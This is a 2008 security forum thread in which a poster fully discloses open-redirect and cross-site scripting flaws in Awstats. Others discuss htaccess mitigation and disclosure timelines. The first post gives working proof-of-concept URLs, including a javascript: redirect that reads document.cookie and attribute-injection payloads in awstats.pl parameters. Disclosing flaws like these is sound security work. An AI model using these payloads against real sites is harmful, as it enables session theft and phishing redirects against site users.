Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Awstats vulnerabilities
Posted by: tx
Date: July 22, 2008 03:02PM

Well, the awstats team has had a month to fix these (more so for some cases), so FD it is:

Open Redirect (disclosed by trev here: http://sla.ckers.org/forum/read.php?3,505,page=11 ): h+tp://example.com/awstats/awredir.pl?url=http://google.com/
With corresponding XSS: h+tp://example.com/awstats/awredir.pl?url=javascript:alert(document.cookie)

XSS: ht+p://www.example.com/awstats/awstats.pl?config=www.example.com&%22onload=%22alert(document.domain)//

EDIT: Forgot one (xss) ht+p://www.example.com/awstats/awstats.pl?config=www.example.com&framename=mainright&output=unknownip%22onmouseover%3D%22alert(document.domain)//

-tx @ lowtech-labs.org



Edited 1 time(s). Last edit at 07/22/2008 03:07PM by tx.

Options: ReplyQuote
Re: Awstats vulnerabilities
Posted by: Gareth Heyes
Date: July 22, 2008 04:29PM

A good idea when installing these types of programs is to protect them with htaccess as well as using their own auth. This protects against XSS attacks and CSRF

------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [www.businessinfo.co.uk]
blog : [www.thespanner.co.uk]
Hackvertor : [hackvertor.co.uk]

Options: ReplyQuote
Re: Awstats vulnerabilities
Posted by: tx
Date: July 22, 2008 04:37PM

yeah htaccess will prevent the xss flaws in awtats.pl, but most sysadmin's tend to not restrict access to awredir.pl because, well that pretty much negates the usefulness of that script (although it's debatable whether that usefulness is actually worth it).

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: Awstats vulnerabilities
Posted by: tx
Date: July 28, 2008 12:40PM

Quote

ht+p://www.example.com/awstats/awstats.pl?config=www.example.com&%22onload=%22alert(document.domain)//
- FIXED

Responsible Disclosure: Not even so much as a response in a month.
Full Disclosure: Issue fixed in less than a week.

Score: Responsible Disclosure = 0; Full Disclosure = 1

(There is still the awredir.pl issues outstanding though...)

-tx @ lowtech-labs.org

Options: ReplyQuote
Re: Awstats vulnerabilities
Posted by: asilvermtzion
Date: August 01, 2008 06:59PM

Why wait a month? You should set a minimum period for acknowledgement and a later date for fix implementation, and let them know that up front.

Options: ReplyQuote


Sorry, only registered users may post in this forum.